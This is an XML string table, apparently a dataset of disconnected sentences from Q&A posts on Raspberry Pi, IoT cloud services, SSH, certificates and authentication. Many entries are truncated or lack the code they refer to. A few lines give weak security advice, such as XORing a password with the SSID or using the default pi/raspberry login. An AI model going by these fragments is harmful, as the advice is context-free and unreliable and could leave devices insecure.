    <t>How can I install moby-engine, moby-cli, IoT Edge Runtime(iotedged security daemon-bootstrapper, edgeAgent, edgeHub) in CoreOS?</t>
  </si>
  <si>
    <t>However, this allowed me to control the raspberry pi from outside my home network.</t>
  </si>
  <si>
    <t>It says the http://192.168.X.X:8000 is not a valid URL or can't be accessed.</t>
  </si>
  <si>
    <t>You will be prompted to confirm the SSH keys and enter the Raspberry Pi user name.</t>
  </si>
  <si>
    <t>I don't know what your server uses but usually sane logins don't use GET and don't pass the login inside the URI.</t>
  </si>
  <si>
    <t>Alternatively, you can tell gdb to not bother you with SIGILL at all before you run the program: handle SIGILL pass nostop noprint.</t>
  </si>
  <si>
    <t>For security reasons Apache user cannot run  command.</t>
  </si>
  <si>
    <t>For example you can shutdown a linux system with:
Make sure the apache user has the permission to execute this command.</t>
  </si>
  <si>
    <t>In this
  example, youll use the authorized_keys method for authenticating your
  users.</t>
  </si>
  <si>
    <t>You can fake it using the VirtualGL package.</t>
  </si>
  <si>
    <t>The card can't get re-initialized.</t>
  </si>
  <si>
    <t>So, firstly that's invalid Lua code for a dictionary.</t>
  </si>
  <si>
    <t>I had the same issue and removing the lock file /var/lib/mongodb/mongod.lock worked for me</t>
  </si>
  <si>
    <t>Because they could contain uninitialised junk (or just stale entries after a reset).</t>
  </si>
  <si>
    <t>If you are just doing this with one or two devices then the network operators will not even notice.</t>
  </si>
  <si>
    <t>When you do this, in the strings you use to authenticate e.g.</t>
  </si>
  <si>
    <t>I have no clue what the purpose of your  call is and where that certificate comes from.</t>
  </si>
  <si>
    <t>Unicode strings must be encoded (e.g.</t>
  </si>
  <si>
    <t>Network operator search his database for that IMSI to see if that IMSI is valid or not.</t>
  </si>
  <si>
    <t>As any command from application will go to all your devices with same token.</t>
  </si>
  <si>
    <t>The certificate has to be specified in exactly the format as follows - i.e.</t>
  </si>
  <si>
    <t>So you might have to change the filenames of your certificates.</t>
  </si>
  <si>
    <t>As a string the value is decoded without error.</t>
  </si>
  <si>
    <t>This is an invalid value for the access conditions.</t>
  </si>
  <si>
    <t>Think the problem is that NLog was born in the Windows world with case-insensitive filenames.</t>
  </si>
  <si>
    <t>You will then be prompted to enter the user's password.</t>
  </si>
  <si>
    <t>Also be sure that the private key is actually on the device, and that it's not corrupted.</t>
  </si>
  <si>
    <t>BTW, you can get the eventHubsCompatibleEndpoint, eventHubsCompatiblePath and iotHubSasKey from Azure Portal simply.</t>
  </si>
  <si>
    <t>When you're logged into Watson IoT Platform's UI in a browser, the 6 character orgId is visible in the URL.</t>
  </si>
  <si>
    <t>The command to enter is: 
now the module runs with Python 3</t>
  </si>
  <si>
    <t>I have modified your codes and tested it.</t>
  </si>
  <si>
    <t>mailboxer is a gem for private message system.</t>
  </si>
  <si>
    <t>The other way round is called decoding.</t>
  </si>
  <si>
    <t>"crypt12" is a file format created by WhatsApp.</t>
  </si>
  <si>
    <t>The browser would then prompt the user for a password.</t>
  </si>
  <si>
    <t>Other access specifiers are protected and private.</t>
  </si>
  <si>
    <t>Applications cannot use these values for private messages.</t>
  </si>
  <si>
    <t>This is called authentication, and it means that the system is trying to find out who you are.</t>
  </si>
  <si>
    <t>Word will return an "EOleException  Value out of range" error if invalid.</t>
  </si>
  <si>
    <t>Amazon Lex leverages AWS Lambda for Intent fulfillment, Amazon Cognito for user authentication, and Amazon Polly for text to speech.</t>
  </si>
  <si>
    <t>After the code is written it is tokenized and loaded into an EEPROM on the microcontroller.</t>
  </si>
  <si>
    <t>When using key-value coding, the key must be a string.</t>
  </si>
  <si>
    <t>Tank Auth is tested in CI 1.7.0, but should be working for above version.</t>
  </si>
  <si>
    <t>It doesn't appear that there is a revokePermission method in the USBManager.</t>
  </si>
  <si>
    <t>Or do I need to get a token from somewhere else and pass it to the device?</t>
  </si>
  <si>
    <t>I just need to call this method and take my token which will be used in Energia (Arduino) project.</t>
  </si>
  <si>
    <t>Error Code= 5
I tried any possible combos of security parameters but at no avail.</t>
  </si>
  <si>
    <t>To change the owner use chown command,
to change the permissions for the user-owner, and group-owner, use the chmod command,
or just use Midnight commander (mc) or some GUI to do that.</t>
  </si>
  <si>
    <t>Add the bluetooth firmware.</t>
  </si>
  <si>
    <t>Above command will get the subscriber ID of the available device.</t>
  </si>
  <si>
    <t>Don't put ( : ) in the fingerprint</t>
  </si>
  <si>
    <t>Consider that, you should put certificates into the device.</t>
  </si>
  <si>
    <t>The device needs to scan for his network and connect to it somehow once it boots.</t>
  </si>
  <si>
    <t>Currently my Raspberry Pi is booting to console and I am connecting via SSH.</t>
  </si>
  <si>
    <t>If your ISP doesn't provide public ip and you are behind NAT.</t>
  </si>
  <si>
    <t>https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project</t>
  </si>
  <si>
    <t>Indeed, the infringer doesn't even have to know about the patent.</t>
  </si>
  <si>
    <t>If you write the web server code the better way, you won't need to do this (although I would do a bounds check on the value passed in the URL to make sure you're getting a valid battery number).</t>
  </si>
  <si>
    <t>Current features are beacon management, event handling, parameter configuration and on premise.</t>
  </si>
  <si>
    <t>Distinguished Encoding Rules (DER) certificate encoding is a method of turning ASN.1 attributes and values into a machine-friendly format.</t>
  </si>
  <si>
    <t>While GCP IoT Core allows for up to 3 public keys per IoT device, you would have to physically replace the secure element chip to get a new key pair to rotate keys.</t>
  </si>
  <si>
    <t>Is geteuid's definition hidden because it could be spoofed into returning the wrong thing (and that would be bad)?</t>
  </si>
  <si>
    <t>Here is my /etc/mysql/my.cnf
I've tried creating new users, giving them all privileges and setting host as both % and 192.168.0.102 which is my pc's ip in local network.</t>
  </si>
  <si>
    <t>The best way to secure data transmission is to use end-to-end encryption.</t>
  </si>
  <si>
    <t>-&gt; https://www.libssh.org/
There is nice documentation as to how to create ssh sessions and executing the commands that we want.</t>
  </si>
  <si>
    <t>You will need to have the following python packages pre-installed for this example to work:  and oauth2client.</t>
  </si>
  <si>
    <t>EDIT:
If you controlling ESP by AT commands, there are some tutorials:
configure access point
AP with WifiBee (* WifiBee is just an PCB with ESP8266 on it)
Sumary:
Set SSID, password, channel and encryption.</t>
  </si>
  <si>
    <t>I want to send those pictures on my main computer, so I wanted the images to have the permission of the user that I use to log in on the RPi.</t>
  </si>
  <si>
    <t>While it should be easy to modify the print()-function to also be zerobyte-safe, I do not consider this as a bug, since the print function is meant for texts.</t>
  </si>
  <si>
    <t>I have a very simple program and when I try to upload, it locks near the end.</t>
  </si>
  <si>
    <t>*I'd put my correct token and variable ID inside the configuration file for this AirPi.</t>
  </si>
  <si>
    <t>How can I remove that "Use by default for this USB device" option, and get the asking permission box back when I connect to my Uno ?</t>
  </si>
  <si>
    <t>I introduced the function tokenize() as part of an update.</t>
  </si>
  <si>
    <t>Reference
https://github.com/project-imas/encrypted-core-data</t>
  </si>
  <si>
    <t>But when I run it it crashes with illegal Argument exception.</t>
  </si>
  <si>
    <t>Presumably I need to change permissions for the Pi user to create, edit and move files in and out of where they run.</t>
  </si>
  <si>
    <t>when i try to connect, a popup appears on the raspberry which ask to confirm connection, because the raspberrry needs to be headless, this option is not good for us.</t>
  </si>
  <si>
    <t>I coded a quick and dirty version for a NEC infrared protocol decoder on Arduino UNO (kind of plain C, no classes).</t>
  </si>
  <si>
    <t>At the moment you have 2 options : 
Upload 1 token to all your ESPs.</t>
  </si>
  <si>
    <t>This might happen when you use an invalid address in the function.</t>
  </si>
  <si>
    <t>For example:
You can then copy one token into each string using the strcpy() or strncpy() function.</t>
  </si>
  <si>
    <t>"npm audit" is a command in the npm CLI that runs a security audit on a project/package to check for any known vulnerabilities.</t>
  </si>
  <si>
    <t>I have entered my username and ID properly, I have even tried putting application specified code given by Google, but I'm still getting this error.</t>
  </si>
  <si>
    <t>I created an app with MIT app inventor that should toggle the IP, but instead gives me: 
error 1109: The specified URL is not valid: 192.168.1.10/$1
Im quite perplexed.</t>
  </si>
  <si>
    <t>/usr/bin/sudo ~/FDRT/stopclock.py
I then rebooted the pi and it didn't do anything 
in /home/pi I opened .xsession-errors file and see i have a permission denied error.</t>
  </si>
  <si>
    <t>I want to access this path by the above code but it was not opened and the error shown was Permission denied.</t>
  </si>
  <si>
    <t>But I wish to encrypt my datas with AES-CBC
I encrypt measures on the ESP8266 with crypto.encrypt() function and 'AES-CBC' method like this example:
https://nodemcu-firmware.readthedocs.io/en/latest/en/modules/crypto/#cryptoencrypt
I do the same encryption on my PC with Python 3 .</t>
  </si>
  <si>
    <t>After the public key is initially uploaded to Google IoT, how can key rotation be performed?</t>
  </si>
  <si>
    <t>Then ssh into it using the default username and pass: pi/raspberry.</t>
  </si>
  <si>
    <t>Using the Federated Identities and User Pools integration you can get temporary AWS credentials for your users.</t>
  </si>
  <si>
    <t>In the lambda function you can verify the JWT id token and return the IAM policy as json.</t>
  </si>
  <si>
    <t>WhatsApp Messenger is a cross-platform mobile messenger supporting end-to-end encryption.</t>
  </si>
  <si>
    <t>I don't know if this can be useful but I opened the file var/log/auth.log on the raspi but there is no line about today.</t>
  </si>
  <si>
    <t>I think this is called software debouncing.</t>
  </si>
  <si>
    <t>If device was offline, then nothing happens (the reboot command never reaches the device).</t>
  </si>
  <si>
    <t>Please note that I replaced my computer's user name with 'username'.</t>
  </si>
  <si>
    <t>The URL it is not working with is private, but overall it links to a google sheet and gets a CSV file.</t>
  </si>
  <si>
    <t>This is an Arduino based home security project.</t>
  </si>
  <si>
    <t>As per the AWS IoT documentation, I stored the RootCA certificate inside JAVA_Home/jre/Lib/Security/CACerts in a keystore.</t>
  </si>
  <si>
    <t>ESP32 espressif DFU library Version 1.5
Currently on Windows 10 (will also be using WSL Debian, Gentoo Linux, and Mac in future)
platformio.ini
[env:esp32dev]
platform = espressif32
framework = espidf
board = esp32dev
build_flags = -DCONFIG_WIFI_SSID=\"ESP_AP\" -DCONFIG_WIFI_PASSWORD=\"MYPASS\"
monitor_speed = 115200
p.s.</t>
  </si>
  <si>
    <t>I use sshfs:
sshfs pi@raspberrypi:/ /home/me/rasp
If this mount is successful, The root file system of the Raspberry Pi is accessible under /home/me/rasp.</t>
  </si>
  <si>
    <t>There's a good SSH library for that: https://github.com/sshnet/SSH.NET
Connect to your Pi, execute the command.</t>
  </si>
  <si>
    <t>Used to exit the PCD from its authenticated state.</t>
  </si>
  <si>
    <t>However this device has a dedicated pin called TXDEN for that.</t>
  </si>
  <si>
    <t>Execute your Test as a non-root user.</t>
  </si>
  <si>
    <t>When using Minicom you will receive a login prompt via the above directions.</t>
  </si>
  <si>
    <t>If the cookie data is larger, you can store it in a file using SPIFFS.</t>
  </si>
  <si>
    <t>This tag should not be used for network, text or file scans.</t>
  </si>
  <si>
    <t>If a randomness source is not found, NotImplementedError will be raised.</t>
  </si>
  <si>
    <t>Purpose
Specifies automatic login information for the ftp and rexec commands.</t>
  </si>
  <si>
    <t>For the C++11 equivalent, unique_ptr, see the reference page.</t>
  </si>
  <si>
    <t>Always be careful who can access the files where sshpass calls are stored.</t>
  </si>
  <si>
    <t>It is the de-facto standard for securing spring-based applications.</t>
  </si>
  <si>
    <t>Support multiple authentication methods.</t>
  </si>
  <si>
    <t>XACML implements an access control model called attribute-based access control or abac.</t>
  </si>
  <si>
    <t>Popular authentication modules include mod_access, mod_auth, mod_digest, and mod_auth_digest, the successor to mod_digest.</t>
  </si>
  <si>
    <t>I see that it is a private extern in the MonoTouch assembly browser.</t>
  </si>
  <si>
    <t>The key will stay there in the parameter until another key is pressed.</t>
  </si>
  <si>
    <t>Using the Arduino GSM library to get authenticated call and sms.</t>
  </si>
  <si>
    <t>I can get the value back from my device, but I'm not sure where to start with creating a custom OID, registering it and then updating it.</t>
  </si>
  <si>
    <t>I've managed to implement the simpleauth package for a basic webapp I've been working on.</t>
  </si>
  <si>
    <t>Do I need some additional files that it needs to reference for doing the SSH?</t>
  </si>
  <si>
    <t>I've made sure that there are no cookies being returned by the application.</t>
  </si>
  <si>
    <t>This is what I have so far and it is returning a value similar to (0L, usernamefield, passwordfield, field3).</t>
  </si>
  <si>
    <t>:(
My question: How do I get the Arduino to send data to the Google Datastore, with a username identity appended to it?</t>
  </si>
  <si>
    <t>Do I reuse the public key or do I need to make a new pair of keys?</t>
  </si>
  <si>
    <t>The string looks like this : {"temp":"69","light":"141","z":"999"} and validates as valid json.</t>
  </si>
  <si>
    <t>network If you are behind a proxy, please make sure that the npm ERR!</t>
  </si>
  <si>
    <t>As of now, identification of available devices, programmatic pairing of devices has been done.</t>
  </si>
  <si>
    <t>returns SIM PIN which means, that the PIN needs to be entered again.</t>
  </si>
  <si>
    <t>Every command was executed as root user.</t>
  </si>
  <si>
    <t>I am storing some data in my Raspberry Pi database after validating it.</t>
  </si>
  <si>
    <t>However, I would like to have a timeout after the validate command it sent.</t>
  </si>
  <si>
    <t>This is the correct way to validate the return?</t>
  </si>
  <si>
    <t>I want to run a python program that polls the keyboard on startup/login to my raspberry pi.</t>
  </si>
  <si>
    <t>220-This is a private system - No anonymous login
    220-IPv6 connections are also welcome on this server.</t>
  </si>
  <si>
    <t>Does a ping response contain the MAC address of the device or is it possible to ask for it over a local network.</t>
  </si>
  <si>
    <t>I built 802.15.4 protocol on CC2538 and i want to test whether it
can transmit and receive data with Xbee Series 1 through XCTU.</t>
  </si>
  <si>
    <t>Since I'm running headless, my primary means of connecting are via ssh and vnc connections from my Chromebook.</t>
  </si>
  <si>
    <t>The paths to the cert and key are correct.</t>
  </si>
  <si>
    <t>in bluetoothctl i scan for the ip and try to pair (after trusting) but i get rejected and i never get prompted for a pin.</t>
  </si>
  <si>
    <t>Contact me by email to receive account information from my test server.</t>
  </si>
  <si>
    <t>Are there any special methods to enable permission WRITE_SETTINGS?</t>
  </si>
  <si>
    <t>I get an error code saying that the operation is invalid with an operator of base 10 (or something close to that).</t>
  </si>
  <si>
    <t>Are there permissions of some sort that may be preventing the data to pass through?</t>
  </si>
  <si>
    <t>Then what i would like to do is send commands through the ssh when they click a button.</t>
  </si>
  <si>
    <t>I'm looking for a method to ensure that communication.</t>
  </si>
  <si>
    <t>This needs admin privileges when running in a desktop app.</t>
  </si>
  <si>
    <t>My 2.4 GHz wifi ssid is 'cake' and I even removed the passphrase to see if that would help.</t>
  </si>
  <si>
    <t>I have a php scrypt that executes python program&gt;index.php.</t>
  </si>
  <si>
    <t>It is a command to let my server "ssh tunel" to a database :
A website hosted on my server (HTTP/apache2) uses this tunel to log to its databse.</t>
  </si>
  <si>
    <t>The script get the ID of a card from a RFID reader, then it post a request on a local server.</t>
  </si>
  <si>
    <t>There is a text file with five Chat ID's and the passwords that look like this:
And the code is:
It almost works as it should.</t>
  </si>
  <si>
    <t xml:space="preserve">
File "/home/pi/pyfingerprint/src/debian/python-fingerprint/usr/share/doc/python-fingerprint/examples/example_search.py", line 12, in 
      from pyfingerprint.pyfingerprint import PyFingerprint
  ImportError: No module named pyfingerprint
I'm using a Python fingerprint sensor in Java, and the error has come up.</t>
  </si>
  <si>
    <t>I'm just trying to reconfigure the STATION module only and then tell it to connect so I can validate the conection.</t>
  </si>
  <si>
    <t>I also tested the Keypad itself to see if it was wired correctly.</t>
  </si>
  <si>
    <t>What i want to do is: Receiving telemetry data from IoTDevice to IoTEdge Device.</t>
  </si>
  <si>
    <t>When I try to connect my Device to the IoT service, among others, I need to provide the private key that was generated along with my certificate.</t>
  </si>
  <si>
    <t>I checked the libssl deployment in the rootfs.</t>
  </si>
  <si>
    <t>Wireless communication methods are not allowed.</t>
  </si>
  <si>
    <t>Is there someway, somehow to intercept the killing of the process so I can get my PWM "zero out" commands in?</t>
  </si>
  <si>
    <t>token"
This line gets highlighted.</t>
  </si>
  <si>
    <t>I want to safe the Databases on an Usbstick and not on my RaspberryPi.</t>
  </si>
  <si>
    <t>But the JSON Library taken from here throws an error of Invalid Input.</t>
  </si>
  <si>
    <t>I have a root CA certificate along with its private key (CAcert.pem and CApvtkey.key).</t>
  </si>
  <si>
    <t>network If you are behind a proxy, please make sure that the
npm ERR!</t>
  </si>
  <si>
    <t>I can connect to the RPI and send it commands via SSH.</t>
  </si>
  <si>
    <t>But, I cant expect the user to go through this process to pair a device with the network.</t>
  </si>
  <si>
    <t>Be sure you are using the right flavor of begin() for you security type, you seem to be using the one for WPA.</t>
  </si>
  <si>
    <t>I had some subfunctions that it could not be seen from here and they where calling setTime for safety reasons (that now is not needed).</t>
  </si>
  <si>
    <t>If you still have trouble then use PortMon to spy on the way Realterm initializes the driver.</t>
  </si>
  <si>
    <t>Unless you've changed the permissions, you need to run as root to use the GPIO module</t>
  </si>
  <si>
    <t>Your private source code would include both.</t>
  </si>
  <si>
    <t>What it happens is that the content is not a valid command, and that's why there is an error.</t>
  </si>
  <si>
    <t>I think you can do what you are trying my corrupting the return address to myFunc1 not myFunc2 like you were trying to.</t>
  </si>
  <si>
    <t>Reference: Why are ports below 1024 privileged?</t>
  </si>
  <si>
    <t>Use  command to give execute permissions to your file.</t>
  </si>
  <si>
    <t>It looks like maybe you have stored the device registration info and are trying to connect with it rather than with quickstart?</t>
  </si>
  <si>
    <t>Otherwise you must reject this input if it's invalid.</t>
  </si>
  <si>
    <t>You must specify your key generated with  in your ssh line.</t>
  </si>
  <si>
    <t>Simply XOR your password with ssid and put the xor'ed version in your code.</t>
  </si>
  <si>
    <t>The correct pin has been used for the CS pin in the  command.</t>
  </si>
  <si>
    <t>So I ran the script then I tried to pair it with my computer and it asked for a PIN, I introduced 0000 and it worked!</t>
  </si>
  <si>
    <t>Use the API to automate assignment of certificates and private keys to nodes.</t>
  </si>
  <si>
    <t>Module  for scanning and connecting to wifi networks on linux wifi.</t>
  </si>
  <si>
    <t>You can't execute SSH commands via HTML or Javascript (maybe JS, but more effort than it's worth).</t>
  </si>
  <si>
    <t>Also all commands in .py file must have correct privileges.</t>
  </si>
  <si>
    <t>Arduino IDE has code examples on menu 
There is also example called WiFiWebClient where you need to change only your wifi ssid and password.</t>
  </si>
  <si>
    <t>The downside is that you're either baking the password into the Thing, or finding a way to get a hold of them that's somehow more secure.</t>
  </si>
  <si>
    <t>The reason you're not being prompted for a password is because you haven't told MySQL to use a password when connecting, to do that use -p like mysql -u root -p.
If you didn't set a password during installation, then there shouldn't be a password in which case mysql -u root should have worked for you.</t>
  </si>
  <si>
    <t>Or you can use shared secret such as a MAC address of the unit.</t>
  </si>
  <si>
    <t>Copy the SHA-1 fingerprint and provide it as a string like the SERVER_FINGERPRINT I included.</t>
  </si>
  <si>
    <t>The typical way to put Preprocessor guards in a .h file is to do something like this example.</t>
  </si>
  <si>
    <t>Please refer agent capabilities here.</t>
  </si>
  <si>
    <t>This lets
  people from outside access services on your local network.</t>
  </si>
  <si>
    <t>You could use a timer that shows a lockscreen after 15 secs of inactivity and zero its timing in the 's onUserInteraction() method.</t>
  </si>
  <si>
    <t>So, the initialization fails somewhere inside gx_priv_initialise.</t>
  </si>
  <si>
    <t>The address I tested with looks like: 
Be sure you are using the iothubowner key value.</t>
  </si>
  <si>
    <t>I faced the same issue with missing cookies.</t>
  </si>
  <si>
    <t>This error is specific to the Python Cryptographic Authority (PyCA)  package, which is used by Firebase.</t>
  </si>
  <si>
    <t>Note that mytimer is not unregistered and not garbage collected.</t>
  </si>
  <si>
    <t>//use this sas token as authorization header before calling the iot restapi</t>
  </si>
  <si>
    <t>You may also look at this which is going to replace the OPC Proxy functionality.</t>
  </si>
  <si>
    <t>A console window should appear, prompting you to log in.</t>
  </si>
  <si>
    <t>Finally, I use the generated private key file (i.e.</t>
  </si>
  <si>
    <t>in GNU libstdc++ delegates to pthread_mutex_lock/unlock calls.</t>
  </si>
  <si>
    <t>This set the ConnectPort X4 up for ZigBee PRO 2007 mode rather than private ZigBee profile mode.</t>
  </si>
  <si>
    <t>File path, specifies a unique location in a file system.</t>
  </si>
  <si>
    <t>An R package to enforce security policies.</t>
  </si>
  <si>
    <t>The QValidator class provides validation of input text.</t>
  </si>
  <si>
    <t>Asana Connect is a way you can connect an Asana account with any partner website or app using a trusted authentication method, OAuth.</t>
  </si>
  <si>
    <t>Npm package to work with Grunt which validate files with Google Closure Linter.</t>
  </si>
  <si>
    <t>It does this while letting your valid users pass through with ease.</t>
  </si>
  <si>
    <t>R package: Help to Fit of a Parametric Distribution to Non-Censored or Censored Data</t>
  </si>
  <si>
    <t>It is part of Apple's Local Authentication framework.</t>
  </si>
  <si>
    <t>Hibernate Validator is the reference implementation for JSR 380 - Bean Validation 2.0</t>
  </si>
  <si>
    <t>j_security_check is a default URL in web applications using JAAS, the Java Authentication and Authorization Service, and Spring Security.</t>
  </si>
  <si>
    <t>This command is used change the permissions of directories and files.</t>
  </si>
  <si>
    <t>In JDK 1.5 an annotation was introduced called SuppressWarnings.</t>
  </si>
  <si>
    <t>Visually mask or override part or all of a UIElement.</t>
  </si>
  <si>
    <t>Generally the access modifiers used are: , private or protected.</t>
  </si>
  <si>
    <t>A minimal1 superkey is called "candidate key", or just "key".</t>
  </si>
  <si>
    <t>Windows systems have a true hidden file attribute allowing to hide file having any name.</t>
  </si>
  <si>
    <t>Trapping invalid values
Most compilers allow for this propagation.</t>
  </si>
  <si>
    <t>Wire up the new class with our ServiceLocator / Di-IoC so the SimpleAuthentication code knows what to do when it's finished.</t>
  </si>
  <si>
    <t>The GitHub Project and the Sprint Framework Website provide support for using Spring Security with OAuth (1a) and OAuth2.</t>
  </si>
  <si>
    <t>Subscriber  somebody who can only manage their profile.</t>
  </si>
  <si>
    <t>A semigroup with an identity element is called a monoid.</t>
  </si>
  <si>
    <t>Plaid provides two main products, Auth and Connect.</t>
  </si>
  <si>
    <t>This process is called tokenization.</t>
  </si>
  <si>
    <t>Support for other login options and UI frameworks are provided by 3rd party packages.</t>
  </si>
  <si>
    <t>It
  is primarily intended for validating data coming into Python as JSON,
  YAML, etc.</t>
  </si>
  <si>
    <t>Asana Connect is a way you can connect an asana account with any partner website or app using a trusted authentication method, oauth.</t>
  </si>
  <si>
    <t>For example, the "nslookup" command tests host name resolution and verifies DNS server registration.</t>
  </si>
  <si>
    <t>Azure repos
Unlimited cloud-hosted private Git repos for your project.</t>
  </si>
  <si>
    <t>They can also run unsigned ActiveX components without prompting the user for authorisation.</t>
  </si>
  <si>
    <t>You can also make it /private/*, /secured/*, etc.</t>
  </si>
  <si>
    <t>There is an SEO audit tool called SEO Toolbar.</t>
  </si>
  <si>
    <t>This tag is has been removed and is pending blacklisting.</t>
  </si>
  <si>
    <t>Authentication Manager sends RSA SecurID Access Authenticator Tokencodes directly to the SSO Agent for authentication.</t>
  </si>
  <si>
    <t>Use the invalidHandler callback function for invalid forms.</t>
  </si>
  <si>
    <t>The Ethereum blockchain is a network where users can build their own apps (which are called dApps) and cryptocurrencies.</t>
  </si>
  <si>
    <t>In other words, EL is null-safe.</t>
  </si>
  <si>
    <t>Such functionality can for example enable a cryptographically private cloud storage and computation service.</t>
  </si>
  <si>
    <t>This is what we call Privacy by Design.</t>
  </si>
  <si>
    <t>For developers there is an area to validate their own modules.</t>
  </si>
  <si>
    <t>Although authentication is based on the private key, the key itself is never transferred through the network during authentication.</t>
  </si>
  <si>
    <t>jKey is a jQuery plugin that makes key shortcuts in JavaScript effortless.</t>
  </si>
  <si>
    <t>Both binary data and character string can be used as a key and a value.</t>
  </si>
  <si>
    <t>Enable
traceback feature.</t>
  </si>
  <si>
    <t>The main design goals of Java Card are portability and security.</t>
  </si>
  <si>
    <t>Attributes which are not part of any key are called non-prime.</t>
  </si>
  <si>
    <t>Hope it helped someone,
Bye
EDIT:
I forgot to add that you must ssh as root user, otherwise wiringPi doesn't work.</t>
  </si>
  <si>
    <t>Arduino based), what is the intended security (authentication) method?</t>
  </si>
  <si>
    <t>(Put token failed.</t>
  </si>
  <si>
    <t>As a result the code will fail on nfc.authenticateBlock().</t>
  </si>
  <si>
    <t>I don't want to add the samba user to adm AND root.</t>
  </si>
  <si>
    <t>I don't know how to save the data/result in Microsoft Access.</t>
  </si>
  <si>
    <t>I also tried the BeaconService option and got zero results too.</t>
  </si>
  <si>
    <t>takes a second parameter which specifies the mode of access.</t>
  </si>
  <si>
    <t>I have put together a wrapper for ifconfig as I want users to be allowed to change only eth0 and not eth1.</t>
  </si>
  <si>
    <t>You can connect to it with that IP 
You might need to add the user to be able to access the connect from outsite, something like this should work for you.</t>
  </si>
  <si>
    <t>SSH or PowerShell to the Raspberry Pi 2 and go to the folder where you put the INF file.</t>
  </si>
  <si>
    <t>The IV of the authentication key is reset only ONCE when authentication starts.</t>
  </si>
  <si>
    <t>You should be able to extract Device Id from it.</t>
  </si>
  <si>
    <t>Each pass can also display a 2D barcode that can be used by a vendor to scan and identify the pass.</t>
  </si>
  <si>
    <t>Whenever I start the code it says invalid syntax and highlights the if.</t>
  </si>
  <si>
    <t>When the Pi boots, it looks for the ssh file.</t>
  </si>
  <si>
    <t>Patent infringement need not be intentional.</t>
  </si>
  <si>
    <t>I've created two different RSA keys for each system, and on my local machine under ~.ssh/config given each Host an alias and corresponding IdentifyFile key, but I still come across the same issue.</t>
  </si>
  <si>
    <t>There seems to be multiple ways to connect to the server: 
First is;
Commented the bind address out  
Created a user in a database then    give the user all privileges.</t>
  </si>
  <si>
    <t>As a result it is important that the time on the server is synchronized as the server might otherwise consider a fully valid token as invalid.</t>
  </si>
  <si>
    <t>Is it possible to modify the boot process of the Raspberry to be able to start executing my code in Secure mode ?</t>
  </si>
  <si>
    <t>Normal - occupies part of the status bar and may be hidden by
temporary messages.</t>
  </si>
  <si>
    <t>A registered callback function is then called back for every packet that traverses the respective hook within the network stack.</t>
  </si>
  <si>
    <t>So basically, I would like to only call this function once, the first time that the user gets an Identity Pool ID.</t>
  </si>
  <si>
    <t>To properly format an identifier, follow these two rules:
Enclose identifier in backticks.</t>
  </si>
  <si>
    <t>I have also tried running transmission as root through docker by removing the PUID and PGID environmental variables from the file.</t>
  </si>
  <si>
    <t>The device is queried in every 500msec, and its response is stored in a local variable.</t>
  </si>
  <si>
    <t>Instead of just passing the GUID, try to follow the OAuth 2.0 Protocol to communicate for the web services provided by your application.</t>
  </si>
  <si>
    <t>That is, if you dont use it, it doesnt do anything, but when you do use it, it will spring into action and provide an underlying mechanism to allow authentication in any Rack-based application.</t>
  </si>
  <si>
    <t>These manifest files, rather than registry keys, direct the activation of a COM object.</t>
  </si>
  <si>
    <t>Any ideas to use write methods and keep all bytes safe?</t>
  </si>
  <si>
    <t>For proximity sensor you have to add the key code  in your device tree like:
In similar way you can add the key code for other functionalities as well.</t>
  </si>
  <si>
    <t>This adds a layer of defense against the possibility of weakness in the selected hash function.</t>
  </si>
  <si>
    <t>I typed the following command to generate the cert file: 
and it seems to be secure.</t>
  </si>
  <si>
    <t>According to the ms docs, there is no way to remove a profile, only disconnect.</t>
  </si>
  <si>
    <t>Now the problem is: how do I deliver the private key back to the device?</t>
  </si>
  <si>
    <t>I have referred few links, I didn't get the proper source to login into the AWS, What I got references, in that they are using AWS Cognito method but my requirement is, need to login with IAM Usercredentials.</t>
  </si>
  <si>
    <t>In other words, SSHKit is a toolkit for running commands in a structured way on one or more servers.</t>
  </si>
  <si>
    <t>An exception to this rule is the user key pairs which are associated to the users and not the tenant.</t>
  </si>
  <si>
    <t>Spring Social provides a ready to use OAuth authentication framework for web based applications.</t>
  </si>
  <si>
    <t>This leads me to believe that there is some sort of permissions difference between running a command in CMD and running it through system().</t>
  </si>
  <si>
    <t>token
How can / should I initialize and properly use the struct?</t>
  </si>
  <si>
    <t>My next solution was to use the private BluetoothManager framework to communicate with the Pi, but this doesn't work on iOS 7.</t>
  </si>
  <si>
    <t>Using Python 2.7 on Raspbian with bbfreeze, can I compile a single module, then import it in another script that is not obfuscated?</t>
  </si>
  <si>
    <t>I want to do this because I'm building my own Alarm System for my front door.</t>
  </si>
  <si>
    <t>I want to login to the SAME session as the already running Raspberry, so I can refresh the browser etc (We're using this to display a company desktop application).</t>
  </si>
  <si>
    <t>After a whole lot of grappling with permissions and tearing hair I finally got the RunOnReceive script to run without exiting on an error.</t>
  </si>
  <si>
    <t>Thankfully I was able to catch the error that I made and have since then logged in successfully.</t>
  </si>
  <si>
    <t>However, if I first render the login screen, replace it with the app and call upgradeDom() again, the layout doesn't work anymore.</t>
  </si>
  <si>
    <t>How to add password to active each button function.</t>
  </si>
  <si>
    <t>A method is available StopNotify which is called when ever client disable Notification.</t>
  </si>
  <si>
    <t>Each IoT Hub devices has it's own security tokens and connection string provided by the IoT Hub service.</t>
  </si>
  <si>
    <t>It works fine when I use it on my home (on which the cloud account was first accessed) network but if I access the API from a different network it raises a token refresh error.</t>
  </si>
  <si>
    <t>In my code I declared and initialized the library in the private part.</t>
  </si>
  <si>
    <t>Here is the code: (Note, I removed the actual cert/keys, so this will not work for you).</t>
  </si>
  <si>
    <t>i ask this because if i provide the wrong login information or IP, the script does not crash or return errors.</t>
  </si>
  <si>
    <t>Unfortunately my target plattform is the Raspberry Pi 3 and there it freezes the system when calling the oauth authentification.</t>
  </si>
  <si>
    <t>I've changed my package names to custom just for privacy.</t>
  </si>
  <si>
    <t>For button, I would just do:
led = Blynk(auth_token, pin = "V3")
Please help me with regards to how can I do the same way and get text from Pi to the Value display.</t>
  </si>
  <si>
    <t>This can be 
 * changed if the server is returning authentication information on a 
 * different header name value.</t>
  </si>
  <si>
    <t>And if the account is subsequently closed/deleted is there a method to de-provision the device?</t>
  </si>
  <si>
    <t>I can setup accessing the internet through the eth0 network, by simply replacing all the wlan0 configuration by eth0 in the tutorial, but then I don't have access to the wlan0 network.</t>
  </si>
  <si>
    <t>I would like a user to log in and see a list of smart devices in their home, the same way that many market ready devices work.</t>
  </si>
  <si>
    <t>I am trying to write a private ethereum blockchain lab for both the college class I teach and a MeetUp group at the financial services firm where I work during the day.</t>
  </si>
  <si>
    <t>220-This is a private system - No anonymous login
